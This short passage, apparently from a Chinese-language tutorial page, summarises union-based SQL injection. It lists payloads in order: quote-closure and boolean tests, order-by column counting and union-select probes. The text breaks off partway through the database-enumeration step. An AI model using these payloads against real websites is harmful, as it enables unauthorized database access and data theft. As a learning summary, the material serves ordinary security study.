Sql注入總結

Sql注入總結 聯合查詢: 1、利用閉合變量報錯測試注入點, ?id=1’ .這樣說明存在單引號閉合注入 2、是否存在注入點,用and語句測試 ?id=1’ and 1=2# ?id=1’ and 1=1# 3、猜測字段 ,?id=1’ order by 3%23 4、找到頁面中數據輸入點, ?id=-1’ union select 1,2,3%23 5、查數據庫,?id=1’ union sel
相關文章
相關標籤/搜索